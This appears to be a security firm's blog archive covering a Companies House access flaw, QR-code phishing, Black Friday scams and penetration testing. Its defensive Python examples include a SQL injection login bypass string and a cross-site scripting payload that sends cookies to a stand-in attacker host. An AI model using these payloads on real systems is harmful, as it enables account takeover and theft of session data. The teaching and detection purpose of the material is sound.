Companies House security issue: What it means for UK businesses

A recent Companies House security issue has raised important questions about the reliability of UK corporate data and the growing risk of fraud linked to public registries.

While not a traditional cyber attack, the vulnerability exposed weaknesses in how company information is accessed and managed, highlighting that even official sources can be open to manipulation.

For businesses, legal professionals and insolvency practitioners, the implications extend beyond data exposure. This incident underscores a broader concern: how much trust can be placed in Companies House data without independent verification?

What happened

The issue stemmed from a flaw within the Companies House WebFiling system, introduced during a system update in late 2025. The vulnerability allowed users to access company records that were not their own, in some cases through simple navigation actions.

As a result, sensitive director information, including dates of birth, residential addresses and contact details, may have been exposed.

More significantly, there were concerns that unauthorised filings could have been made, including:

  • Changes to director details
  • Amendments to registered office addresses
  • Submission of company filings

While there is no confirmed evidence of widespread abuse, the fact that the vulnerability existed for months has led to concerns around Companies House data reliability and potential misuse.

Why this matters for businesses

Increased corporate fraud risk

Companies House is widely used as a trusted data source by banks, lenders, counterparties and legal professionals. A weakness in this system creates opportunities for corporate fraud in the UK, particularly where bad actors exploit inaccurate or manipulated records.

This could include:

  • Impersonating legitimate companies
  • Opening bank accounts fraudulently
  • Diverting payments or correspondence

This form of corporate identity fraud is becoming increasingly sophisticated, particularly where verification processes rely heavily on registry data alone.

Director data exposure and targeted attacks

The exposure of personal data significantly increases the risk of:

  • Identity theft
  • Phishing and spear-phishing attacks
  • Social engineering targeting directors and senior individuals

Directors are often key decision makers with access to financial controls, making them high-value targets. The availability of this data through a Companies House vulnerability lowers the barrier for targeted fraud.

Reliability of Companies House data

For legal professionals and insolvency practitioners, this incident raises a critical issue: can Companies House be treated as a single source of truth?

In practice, reliance on unverified registry data can introduce risk into:

Where company records may be inaccurate or temporarily manipulated, decisions based solely on this data may be flawed.

How could this have been prevented?

The vulnerability appears to have been the result of system design and control failures, rather than a sophisticated external breach. Several preventative measures could have reduced the risk:

Stronger access controls

Authorisation has to be enforced on every request at the level of the object being accessed (this company's record, this filing), not only at login. An authenticated user who is not entitled to a company should be refused in the same way whether they reach its record through the menus, a bookmarked link or an edited URL; proper segregation of user permissions should leave no route to another company's records without authorisation.
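The difference between checking that someone is logged in and checking that they are entitled to the record they asked for is the whole of the point above. The following is an added illustration, not Companies House code: the in-memory store, the session model and the company numbers are constructed, and the flawed handler is written to show the pattern described in this article (record selected by an identifier the user controls, with no per-object check) beside the hardened form.

```python
"""Object-level authorisation on a record lookup.

Added example, not Companies House code. The in-memory 'RECORDS' store,
the Session model and the company numbers are constructed for the
illustration; the pattern (check the caller's entitlement to *this*
object on every request) is the general one.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller is not authorised for the requested record."""


@dataclass
class Session:
    user_id: str
    # Companies this user has proved control of (e.g. via an authentication code).
    authorised_companies: frozenset = field(default_factory=frozenset)


# Constructed sample data: company number -> sensitive officer record.
RECORDS = {
    "01234567": {"name": "Example Holdings Ltd", "director_dob": "1970-01", "home_address": "1 Example Street"},
    "07654321": {"name": "Sample Trading Ltd", "director_dob": "1985-06", "home_address": "2 Sample Road"},
}


def get_record_vulnerable(session: Session, company_number: str) -> dict:
    """The flawed pattern: login is checked, entitlement to the object is not.

    Any authenticated user who edits the company number in the URL reaches
    another company's officer data.
    """
    if not session.user_id:
        raise Forbidden("not logged in")
    return RECORDS[company_number]


def get_record_hardened(session: Session, company_number: str) -> dict:
    """Authorisation is enforced per object, on every request.

    The entitlement check runs before the store is touched, so a probing
    caller gets the same refusal for a company that exists and one that
    does not: the response is not an oracle for valid company numbers.
    """
    if not session.user_id:
        raise Forbidden("not logged in")
    if company_number not in session.authorised_companies:
        raise Forbidden(f"user {session.user_id} not authorised for {company_number}")
    record = RECORDS.get(company_number)
    if record is None:
        raise KeyError(company_number)
    return record


def demo() -> dict:
    """Run both handlers for a user entitled only to company 01234567."""
    session = Session(user_id="alice", authorised_companies=frozenset({"01234567"}))
    out = {"vulnerable_leaks": None, "hardened_blocks": False, "hardened_allows": False}
    # Vulnerable: alice reads Sample Trading's director data by editing the identifier.
    out["vulnerable_leaks"] = get_record_vulnerable(session, "07654321")["home_address"]
    try:
        get_record_hardened(session, "07654321")
    except Forbidden:
        out["hardened_blocks"] = True
    out["hardened_allows"] = get_record_hardened(session, "01234567")["name"] == "Example Holdings Ltd"
    return out


if __name__ == "__main__":
    print(demo())
```

The test a release process should have included is the second call in `demo()`: a user who holds one company's credentials asking for a different company's record, expecting a refusal.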

Robust testing and QA processes

The flaw was introduced during a system update and remained undetected for months, suggesting that the release process lacked authorisation testing (can user A reach company B's record?) alongside functional regression tests, and that nobody was checking the system's behaviour from the perspective of a user who should be refused.

Layered security approach

Over-reliance on a single authentication factor (such as the company authentication code used for filing) creates risk: anyone holding that one credential can act for the company. A defence-in-depth approach, combining multiple verification layers so that no single credential is enough to read or change a record, would significantly reduce exposure.

Continuous monitoring and alerts

Effective systems should detect:

  • Unusual access patterns
  • Irregular filing activity
  • Cross-account access attempts

The absence of such controls allowed the issue to persist longer than it should have.
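The three detections listed above can be expressed as simple rules over the filing system's own access logs. The block below is an added example (not Companies House tooling): the log line format, the entitlement table, the thresholds and the sample lines are all constructed for the illustration, with a user "mallory" walking through records she is not entitled to and then filing against one of them.

```python
"""Detection rules over constructed filing-system access logs.

Added example, not Companies House tooling. The log line format, the
ENTITLEMENTS table and the thresholds are assumptions for the illustration;
the three rules mirror the controls above: cross-account access,
unusual access patterns and irregular filing activity.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) company=(?P<company>\d{8}) "
    r"action=(?P<action>\S+) result=(?P<result>\d{3})$"
)

# Constructed entitlements: which companies each user has proved control of.
ENTITLEMENTS = {"alice": {"01234567"}, "bob": {"07654321"}}

# Form types that change officers or the registered office.
FILING_ACTIONS = {"file_AP01", "file_CH01", "file_AD01"}

# Constructed sample log (UTC). 'mallory' enumerates records, then files.
SAMPLE_LOG = """\
2025-11-03T09:00:00Z user=alice company=01234567 action=view_officers result=200
2025-11-03T09:01:10Z user=bob company=07654321 action=file_AD01 result=200
2025-11-03T09:02:00Z user=mallory company=01234567 action=view_officers result=200
2025-11-03T09:02:05Z user=mallory company=01234568 action=view_officers result=200
2025-11-03T09:02:11Z user=mallory company=01234569 action=view_officers result=200
2025-11-03T09:02:15Z user=mallory company=01234570 action=view_officers result=200
2025-11-03T09:02:20Z user=mallory company=01234571 action=view_officers result=200
2025-11-03T09:05:00Z user=mallory company=07654321 action=file_CH01 result=200
2025-11-03T09:06:00Z user=mallory company=07654321 action=file_AP01 result=200
"""


def parse(log_text: str) -> list[dict]:
    """Parse log lines; a malformed line is an error, not something to drop silently."""
    events = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: unrecognised format: {line!r}")
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def cross_account_access(events: list[dict]) -> list[tuple]:
    """Rule 1: any access to a company the user has not proved control of."""
    return [(ev["user"], ev["company"], ev["action"])
            for ev in events if ev["company"] not in ENTITLEMENTS.get(ev["user"], set())]


def unusual_access_patterns(events: list[dict], distinct: int = 5,
                            window: timedelta = timedelta(minutes=10)) -> dict:
    """Rule 2: one user touching many distinct companies in a short window (enumeration)."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda x: x["ts"]):
        by_user[ev["user"]].append(ev)
    flagged = {}
    for user, evs in by_user.items():
        for i, ev in enumerate(evs):
            seen = {x["company"] for x in evs[: i + 1] if ev["ts"] - x["ts"] <= window}
            if len(seen) >= distinct:
                flagged[user] = len(seen)
                break
    return flagged


def irregular_filing_activity(events: list[dict], burst: int = 2,
                              window: timedelta = timedelta(hours=24)) -> dict:
    """Rule 3: a filing by a non-entitled user, or a burst of filings against one company."""
    flagged: dict = {}
    by_company = defaultdict(list)
    for ev in (x for x in events if x["action"] in FILING_ACTIONS):
        if ev["company"] not in ENTITLEMENTS.get(ev["user"], set()):
            flagged.setdefault(ev["company"], set()).add("filing by non-entitled user")
        by_company[ev["company"]].append(ev["ts"])
    for company, times in by_company.items():
        times.sort()
        for i in range(len(times) - burst + 1):
            if times[i + burst - 1] - times[i] <= window:
                hours = window.total_seconds() / 3600
                flagged.setdefault(company, set()).add(f"{burst}+ filings within {hours:g}h")
                break
    return {c: sorted(r) for c, r in flagged.items()}


def run(log_text: str = SAMPLE_LOG) -> dict:
    events = parse(log_text)
    return {"cross_account": cross_account_access(events),
            "unusual_access": unusual_access_patterns(events),
            "irregular_filing": irregular_filing_activity(events)}


if __name__ == "__main__":
    print(run())
```

On the sample, rule 1 fires on every one of mallory's requests, rule 2 fires when she reaches her fifth distinct company inside the ten-minute window, and rule 3 flags company 07654321 both because the filer is not entitled and because it received more than one sensitive filing in a day. Rule 1 alone would have surfaced the issue described in this article on the first day.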

What should companies do now?

In light of this Companies House security issue, businesses should take proactive steps to mitigate risk:

  • Review company records for any unauthorised changes
  • Monitor filing history and updates regularly
  • Restrict internal access to filing credentials
  • Educate directors on fraud and phishing risks
  • Conduct enhanced due diligence on counterparties
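The first two steps above (review the record, monitor the filing history) can be automated against the register itself. The block below is an added example, not ESA Risk or Companies House code: it diffs a stored snapshot of a company's filing history against a current one and raises an alert for new filings of the types that change directors or the registered office. The two snapshots are constructed in the shape of the public Companies House filing-history resource (a list of items with a transaction_id, date, type and category); the optional live lookup in `fetch_filing_history()` needs an API key from the Companies House developer hub and is not called by the offline run.

```python
"""Baseline-diff check on a company's filing history.

Added example (not ESA Risk or Companies House code). BASELINE and CURRENT
are constructed snapshots in the shape of the public Companies House
filing-history resource; fetch_filing_history() is the optional live call
and needs an API key from https://developer.company-information.service.gov.uk/.
"""
import base64
import json
import urllib.request

API_BASE = "https://api.company-information.service.gov.uk"

# Form types whose unexpected appearance warrants an immediate look.
SENSITIVE_TYPES = {
    "AP01": "director appointed",
    "TM01": "director terminated",
    "CH01": "director details changed",
    "AD01": "registered office address changed",
}


def fetch_filing_history(company_number: str, api_key: str) -> dict:
    """Live lookup (not used by the offline demo). The API uses HTTP Basic auth
    with the key as the username and an empty password."""
    url = f"{API_BASE}/company/{company_number}/filing-history?items_per_page=100"
    token = base64.b64encode(f"{api_key}:".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def new_filings(baseline: dict, current: dict) -> list[dict]:
    """Filings present now that were not in the stored baseline, keyed on transaction_id."""
    known = {item["transaction_id"] for item in baseline.get("items", [])}
    return [item for item in current.get("items", []) if item["transaction_id"] not in known]


def triage(unexpected: list[dict], expected_types=frozenset()) -> dict:
    """Split new filings into 'alert' (sensitive and not pre-announced) and 'info'.

    expected_types lets the company pre-register a change it is making itself,
    so that only filings it did not make are alerted on.
    """
    alert, info = [], []
    for item in unexpected:
        ftype = item.get("type", "")
        if ftype in SENSITIVE_TYPES and ftype not in expected_types:
            alert.append({**item, "why": SENSITIVE_TYPES[ftype]})
        else:
            info.append(item)
    return {"alert": alert, "info": info}


# Constructed snapshots (transaction ids are made up). BASELINE is last month's
# view; CURRENT adds a confirmation statement the company did file and an AD01
# (registered office change) it did not.
BASELINE = {"items": [
    {"transaction_id": "TXN-0002", "date": "2025-06-02", "type": "CS01",
     "category": "confirmation-statement", "description": "confirmation-statement-with-no-updates"},
    {"transaction_id": "TXN-0001", "date": "2025-03-14", "type": "AA",
     "category": "accounts", "description": "accounts-with-accounts-type-micro-entity"},
]}
CURRENT = {"items": [
    {"transaction_id": "TXN-0004", "date": "2025-11-21", "type": "AD01",
     "category": "address", "description": "change-registered-office-address-company"},
    {"transaction_id": "TXN-0003", "date": "2025-11-20", "type": "CS01",
     "category": "confirmation-statement", "description": "confirmation-statement-with-no-updates"},
] + BASELINE["items"]}


def check(baseline: dict = BASELINE, current: dict = CURRENT, expected_types=frozenset()) -> dict:
    """Offline run: diff the two snapshots and triage what is new."""
    return triage(new_filings(baseline, current), expected_types)


if __name__ == "__main__":
    result = check()
    for item in result["alert"]:
        print(f"ALERT {item['date']} {item['type']}: {item['why']} ({item['transaction_id']})")
    for item in result["info"]:
        print(f"info  {item['date']} {item['type']}")
```

Run on a schedule with the previous response stored as the baseline, this turns "monitor filing history regularly" into a daily check that only interrupts someone when an officer or address filing appears that the company did not make itself.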

Taking these steps can reduce exposure to company filing fraud and improve overall resilience.

The role of corporate investigations and due diligence

This incident highlights a key point: public registry data should not be relied upon in isolation.

At ESA Risk, we support clients with:

  • Independent verification of company information
  • Identification of discrepancies in filings
  • Corporate investigations into ownership and control
  • Due diligence on business partners and counterparties
  • Fraud risk assessment and ongoing monitoring

Where there is uncertainty around data integrity, independent intelligence provides clarity and reduces risk.

A wider issue for UK corporate transparency

The UK has taken steps to strengthen corporate transparency through legislative reform. However, this incident demonstrates that data availability must be matched by data security.

As Companies House becomes more central to fraud prevention efforts, its reliability and resilience are increasingly critical. For businesses and advisors, this means adopting a more cautious and investigative approach to corporate data.

Key takeaways for businesses and advisors

The Companies House vulnerability is a timely reminder that even official systems are not immune to risk.

For businesses, the threat lies in fraud, impersonation and data misuse. For legal and financial professionals, it highlights the importance of verifying information beyond surface-level records.

In an environment where corporate fraud risk in the UK continues to evolve, relying solely on publicly available data is no longer sufficient.

Independent verification, proactive monitoring and informed investigation are now essential components of effective risk management.

Speak to ESA Risk today

If you have concerns around the accuracy of Companies House data or potential exposure to corporate fraud, ESA Risk can assist. We support businesses, legal professionals and insolvency practitioners with discreet, intelligence-led enquiries to verify company information and identify risk.

Whether you require straightforward verification of company records or more in-depth investigations into ownership, control or suspected manipulation, we will work with you to understand your objectives and tailor our approach accordingly.

Where there is uncertainty around filings or director information, we can also undertake tracing, due diligence and background enquiries to ensure you are relying on accurate, up-to-date intelligence.

Contact our Client Services team at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.


Gone quishing: The rise of QR code scams

During a time of rapid digital transformation, new forms of cyber threats constantly emerge. One such threat increasing in the world of cyber security is known as ‘quishing,’ a term derived from QR codes and phishing.

What is quishing?

Similar to classic phishing strategies, quishing exploits Quick Response (QR) codes to deceive individuals into divulging sensitive information or downloading malicious software.

It involves scammers creating these two-dimensional barcodes which, when scanned, lead unsuspecting users to fraudulent websites or prompt the download of malware directly onto their device.

This form of scam capitalises on the QR code’s popularity, convenience, and the public’s growing comfort with using them for everything from restaurant menus to payment systems.

The rise in QR code related scams

The BBC recently reported that QR code related scams are continuing to rise, with instances up 14-fold over five years.

These scams are primarily orchestrated by organised crime groups and have seen a sharp increase from 100 reports in 2019 to 1,386 in the previous year, as recorded by the national fraud reporting centre, Action Fraud.

The consequences of these scams can be severe, with victims sometimes losing substantial amounts of money, which in turn finances further criminal activities. Scammers have diversified their methods, using QR codes on printed flyers, in emails, and on social media, duping people into handing over sensitive information like bank details.

There are concerns that this type of scam is underreported, and figures could be even higher. This is because people scammed out of smaller amounts of money are less likely to report. However, money may not be the sole target, with further risks of sensitive data being lifted from devices then sold on or used for more complex fraud later down the line.

How to spot and prevent quishing

To protect yourself from quishing scams, here is what to look for and preventive measures to take:

Examine the URL: Before scanning a QR code, make sure the surrounding context seems legitimate. If you can, preview the link that the QR code will direct you to. This feature is available on some smartphones and third-party QR code scanning apps.

Look for tampering: A legitimate-looking sticker or code might be placed over the original one, directing you to a malicious site. Stay vigilant about where you find these codes.

Avoid downloading apps directly: If a QR code prompts you to download an application, it is safer to go through the official app store on your device.

Use trusted QR scanners: Some apps check the safety of a website before opening it and can offer an additional layer of security.

Employ cybersecurity tools: For businesses, it’s crucial to have cyber security systems in place that can detect and block malicious web content.
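The "examine the URL" and "use trusted QR scanners" points above come down to a handful of checks on the decoded payload before it is opened. The block below is an added example, not ESA Risk tooling or any scanner app's code: it takes the string a scanner would show in its preview and returns the reasons to hesitate. The shortener list and the `expected_domain` idea (the brand or venue the code claims to be for, such as a council's parking site) are assumptions for the illustration; the checks themselves are ordinary URL hygiene.

```python
"""Triage of a decoded QR payload before it is opened.

Added example, not ESA Risk tooling. Input is the text a scanner app shows in
its preview; output is a list of warnings. SHORTENERS and the expected_domain
idea are assumptions for the illustration.
"""
from urllib.parse import urlsplit

# Constructed list: common link shorteners hide the real destination.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly"}
DOWNLOAD_EXTENSIONS = (".apk", ".exe", ".msi", ".dmg", ".ipa", ".zip")
ACTION_SCHEMES = ("tel:", "sms:", "smsto:", "mailto:", "wifi:", "intent:")


def registrable_part(host: str) -> str:
    """Last two labels of the hostname (enough for .com/.ly; not a public-suffix parser)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def triage_qr_payload(payload: str, expected_domain: str = "") -> list[str]:
    """Return human-readable warnings; an empty list means nothing obviously wrong."""
    warnings = []
    payload = payload.strip()
    lowered = payload.lower()

    # Payloads that trigger an action (call, text, join a network, open an app) rather than a page.
    if lowered.startswith(ACTION_SCHEMES):
        warnings.append(f"payload triggers an action ({payload.split(':', 1)[0]}), not a web page")
        return warnings

    parts = urlsplit(payload)
    if parts.scheme not in ("http", "https"):
        warnings.append(f"unexpected scheme '{parts.scheme or 'none'}'")
        return warnings
    if parts.scheme == "http":
        warnings.append("plain http: the page can be altered or read in transit")

    host = (parts.hostname or "").lower()
    if not host:
        warnings.append("no hostname")
        return warnings
    if parts.username or parts.password:
        # https://paypal.com@203.0.113.9/ : the part before '@' is a username, not the site.
        warnings.append("credentials embedded before '@' (classic lookalike trick)")
    if all(label.isdigit() for label in host.split(".")):
        warnings.append("raw IP address instead of a domain name")
    if "xn--" in host:
        warnings.append("internationalised (punycode) hostname: check for lookalike characters")
    if registrable_part(host) in SHORTENERS:
        warnings.append("link shortener: real destination is hidden")
    if parts.path.lower().endswith(DOWNLOAD_EXTENSIONS):
        warnings.append("links directly to an installer/archive: use the official app store instead")
    if expected_domain:
        # A brand name inside the host (council.gov.uk.pay-now.top) does not make it the brand's site:
        # only the exact domain or a subdomain of it passes.
        expected = expected_domain.lower()
        if host != expected and not host.endswith("." + expected):
            warnings.append(f"hostname '{host}' is not {expected} or a subdomain of it")
    return warnings


if __name__ == "__main__":
    for sample in ("https://www.example-council.gov.uk/parking/pay?bay=12",
                   "http://bit.ly/3xyzABC",
                   "https://paypal.com@203.0.113.9/login"):
        print(sample, "->", triage_qr_payload(sample, "example-council.gov.uk") or "ok")
```

The parking-meter fraud mentioned below is exactly the case the `expected_domain` check is for: a sticker on a council meter should resolve to the council's own domain, and a shortener or an unrelated host is reason enough to pay another way.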

Given the rise in both the use of QR codes and the sophistication of scammers, quishing is expected to become a more significant threat. Awareness campaigns are crucial, as informed users are the first line of defence against these types of scams.

Individuals need to remain cautious, especially as scammers continue to target mobile devices with QR codes in ever more cunning ways. A recent example involved fraudulent parking meter codes, an industry where QR codes are utilised frequently, leading users to pay parking fees via a fraudster’s account.

For businesses, the consequences of quishing scams can be serious, leading to data breaches, financial loss, reputational damage and eroded customer trust. As such, it remains essential for organisations to educate employees on the dangers of QR code scams and to put in place controls that sift out phishing attempts: a Secure Email Gateway (SEG) that decodes QR codes embedded in email images and checks their destinations, and web or DNS filtering that blocks the malicious site when a phone does follow the link. Note that a Web Application Firewall (WAF) protects your own web applications from attack; it does nothing for a user who scans a code that leads somewhere else.

Quishing is just one of the many dangers in the cyber landscape, and both individuals and businesses must take proactive steps to guard against such deceptive practices.

By staying informed, sceptical, and utilising security tools, we can fend off the malicious intent hidden behind those seemingly innocuous pixelated squares.

Cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber secure please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.


Black Friday 2024: Stay cyber-safe

As Black Friday 2024 approaches, the excitement for massive discounts and unbeatable deals is natural. However, it’s important to be aware that this shopping bonanza also brings an increased risk of cyber scams and fraud.

With cyber threats becoming more sophisticated, it’s crucial that shoppers stay informed and protect their personal and financial information.

According to a recent statement from the UK’s Cyber Security Chief, Richard Horne, the festive sales period now experiences a noticeable spike in cyber incidents, dubbing the event a “prime time for cyber criminals, who exploit bargain hunters with increasingly sophisticated scams”.

With victims of shopping scams losing over £11m between November 2023 and January 2024, according to reports from GCHQ's National Cyber Security Centre (NCSC) and Action Fraud, the importance of remaining vigilant during this period cannot be overstated.

Cyber criminals continue to employ ever more ruthless tactics to exploit consumers' enthusiasm and lowered guard during these sales. Utilising AI platforms allows them to develop increasingly convincing scams and makes fraudulent offers even harder to detect.

Though many of these scams include fake listings for products on social media sites, the evolution of AI means whole websites can be created to list fraudulent products and steal financial information.

However, there are steps you can take to protect yourself this Black Friday:

1. Use secure connections only

Avoid making purchases over public Wi-Fi, where you cannot know who else is on the network or who runs it; use your mobile data or a private connection instead, and check that the site is served over HTTPS (the padlock in the address bar) before entering card details.

2. Update your software

Ensure your devices, including smartphones and laptops, have the latest security updates and antivirus programs installed.

3. Create strong, unique passwords

Use strong and unique passwords for all different retail sites. Consider using a password manager to keep track of them securely.

4. Employ two-factor authentication

Enabling two-factor authentication (2FA) adds an extra layer of security, making it harder for cyber criminals to access your accounts even if they have obtained your password.

5. Beware of phishing scams

Be sceptical of emails or messages that demand urgent action, such as providing personal information or clicking on unknown links. In 2024, phishing attacks have grown more cunning, blending seamlessly into regular communications. Be wary of clicking links and downloading files.

6. Shop wise, pay safe

Be cautious of deals that seem too good to be true or with merchants demanding payment through unconventional methods like direct bank transfers or cryptocurrency. Official retailer websites and trusted payment systems offer more security.

7. Do your research

Ensure you’re shopping on reputable websites or stores. Look up reviews, ratings, and feedback from previous customers. Compare prices across different platforms to ensure “discounts” aren’t inflated prices reduced to appear like a deal.


Black Friday is an exciting time for both shoppers and retailers. By following cyber security best practices and maintaining a degree of scepticism towards online offers, you can protect yourself from becoming a statistic.

Stay alert, keep your software updated, and prioritise security over convenience to ensure a safe and enjoyable shopping experience. If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Contact Ben Brown, Cyber Security Consultant at ben.brown@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

Penetration Testing: How regular checks can safeguard your business

As cyber attacks grow more sophisticated, the need for robust security measures has never been more critical. Penetration testing, also known as pen testing or ethical hacking, is a proactive approach to uncovering vulnerabilities in IT systems and software. By simulating a cyber attack against computer systems, applications and networks, pen testers can identify and rectify security weaknesses before malicious hackers can exploit them.

Understanding penetration testing

Penetration testing delves into the assessment of computers, networks, and web applications to discover potential vulnerabilities that could be exploited by attackers. By executing controlled attacks in a safe environment, organisations can better understand the effectiveness of their existing security policies and mechanisms.

This form of testing can be conducted from within the network (internal testing) or from outside (external testing) to simulate various methods of cyber attack.

Cyber security penetration techniques

At ESA Risk, we offer a range of penetration testing services tailored to your unique needs and requirements.

One of our newest consultants, experienced cyber security professional Ben Brown, leverages his knowledge of advanced tools, techniques and methodologies to conduct thorough assessments and provide actionable recommendations for improving your security posture.

Our penetration testing services include:

Internal network penetration testing

Our network penetration testing services involve a comprehensive evaluation of your organisation’s network infrastructure, servers and endpoints. By emulating real-world cyber attacks, we identify vulnerabilities such as misconfigurations, weak passwords, unpatched systems, and insecure network protocols that could be exploited by threat actors.

We meticulously analyse network traffic, conduct port scanning, and assess firewall rules to identify potential security weaknesses.

Web application penetration testing

Web applications are a common target for cyber attacks due to their exposure to the internet and the complexity of their code. Our web application penetration testing services focus on identifying vulnerabilities in web applications, APIs and other web-based assets. Using a combination of automated tools and manual techniques, our experts assess the security of web applications, uncovering flaws such as SQL injection, cross-site scripting (XSS) and insecure direct object references. By conducting thorough assessments, we help you secure your web applications and protect sensitive data from unauthorised access.
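Two of the flaw classes named above, each beside its fix, as an added illustration (not ESA Risk's testing tooling or any client code). The in-memory SQLite database, the users table and the inputs are constructed for the example; the injection string is the textbook one, and the cross-site scripting fix shown is output encoding for the HTML text context only.

```python
"""SQL injection and cross-site scripting, each beside its fix.

Added example, not ESA Risk tooling. The in-memory SQLite database and the
'users' table are constructed; passwords are stored in clear only to keep the
example short (a real system stores a salted hash).
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct-horse", "admin"),
        ("bob", "battery-staple", "user"),
    ])
    return conn


# --- SQL injection -----------------------------------------------------------

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[tuple]:
    """String-built query: attacker-controlled text becomes part of the SQL."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> list[tuple]:
    """Bound parameters: the input can only ever be compared as a value."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# --- Cross-site scripting ----------------------------------------------------

def greeting_vulnerable(name: str) -> str:
    """Untrusted input concatenated straight into HTML."""
    return f"<p>Welcome back, {name}!</p>"


def greeting_escaped(name: str) -> str:
    """Output encoding for the HTML text context.

    Attribute values, JavaScript and URL contexts each need their own encoder;
    html.escape alone is not enough there.
    """
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def demo() -> dict:
    """Run each pair against the same malicious input."""
    conn = make_db()
    injection = "' OR '1'='1' --"     # closes the quote, makes the WHERE always true, comments out the rest
    script = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
    return {
        "sqli_vulnerable_rows": login_vulnerable(conn, injection, "wrong"),
        "sqli_parameterised_rows": login_parameterised(conn, injection, "wrong"),
        "xss_vulnerable": greeting_vulnerable(script),
        "xss_escaped": greeting_escaped(script),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

With the injection string, the vulnerable login returns every user (including the admin) without a valid password, while the parameterised version returns nothing; the escaped greeting renders the script tag as visible text instead of executing it.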

Social engineering testing

Social engineering remains a prevalent tactic used by threat actors to exploit human vulnerabilities and manipulate individuals into disclosing sensitive information.

Our social engineering testing services evaluate an organisation’s susceptibility to social engineering attacks and phishing attempts. By simulating phishing campaigns, pretexting scenarios and physical intrusion attempts, we assess the awareness and response capabilities of employees at all levels to social engineering tactics. This testing helps you enhance employee training programmes, implement security awareness initiatives, and strengthen defences against social engineering threats.

Benefits of penetration testing for businesses

  • Proactive defence: One of the primary benefits of penetration testing is its proactive nature, allowing businesses to identify and fix vulnerabilities before they are exploited. This can prevent severe data breaches and the associated financial and reputational damages.
  • Compliance with regulatory requirements: Many industries have strict regulatory requirements that include cyber security assessments. Penetration testing helps demonstrate compliance with regulations such as the GDPR, thereby avoiding significant fines and legal implications.
  • Preservation of corporate image and customer trust: By ensuring that data breaches are less likely, companies maintain their reputation and build trust with their clients. In the digital age, consumer trust is as valuable as the tangible services or products offered.
  • Cost-effective security: While penetration testing requires upfront investment, it is considerably less expensive than the costs associated with a data breach, which can include legal fees, compensation, and the intangible costs of lost consumer trust and brand devaluation.

The changing landscape of cyber security

As technology evolves, so does the cyber security landscape. New vulnerabilities and methods of attack are constantly developed. With the integration of IoT, cloud computing and other emerging technologies into daily business processes, organisations face an ever-expanding risk landscape. Today's security systems need to be dynamic and responsive, which makes the role of regular penetration testing critical.

Staying informed on cyber risks

Cyber security is not a one-time achievement but a continuous process. Staying informed is crucial. Regular updates to security protocols, frequent penetration testing, and staying abreast of the latest cyber threats are essential practices. Businesses must invest in continuous learning and the development of IT staff to handle new and evolving security challenges effectively.

Penetration testing plays a vital role in the cyber security strategy of any business. By allowing you to identify, manage and mitigate vulnerabilities proactively, it not only protects you against attacks but also saves you from potential financial and reputational damage in the future. With the cyber security landscape continuously changing, tools like penetration testing that can adapt and evolve are priceless. Any company looking to safeguard their future in the increasingly digital world should consider penetration testing an essential tool in their cyber security arsenal.

Cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber secure, including penetration testing please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

Cyber security: Navigating the evolving landscape

The landscape of cyber threats is ever-evolving – reflecting the current dominance of digital advancements (AI, anyone?) in our work and personal lives. With reports of ransomware attacks and data breaches becoming more and more common, how concerned should you be about your business’s cyber security?

Motivations behind cyber crime

There are differing motivations behind cyber attacks, though among ‘black hat’ hackers – your stereotypical cyber criminals who work to break into personal networks and devices to steal sensitive data – financial gain is the most common. A Verizon study from 2023 involving multiple countries, including the UK, revealed that the majority of data breaches (97%) were money driven.

With online hacking groups focusing their efforts where they can cause the most damage, law firms are among those considered a valuable target due to the abundance of sensitive data and privileged information stored in their networks. Once such data is obtained, it can be held for ransom and/or sold on the dark web. Sensitive data can often be lucrative in the virtual underworld.

Other motives include reputation. For some cyber criminals, it’s all about the thrill of overcoming security measures and infiltrating systems. These individuals frequently target high-profile organisations, deeming a successful breach a personal triumph. However, the consequences of these breaches can be severe, compromising customer trust and damaging a business’ reputation.

An example of this is the 2014 cyber-attack on Sony Pictures Entertainment, a breach that exposed sensitive employee data, private email exchanges and unreleased films. As a result, Sony Pictures faced extensive reputational damage, as well as significant financial loss.

More recent examples include Royal Mail, targeted by the ransomware group LockBit last January, and 'magic circle' law firm Allen & Overy later the same year. The group took credit for the latter attack on its own website, clearly keen to claim the high-profile breach, which suggests that media coverage and notoriety among cyber criminals may be another motivating factor.

Does size matter?

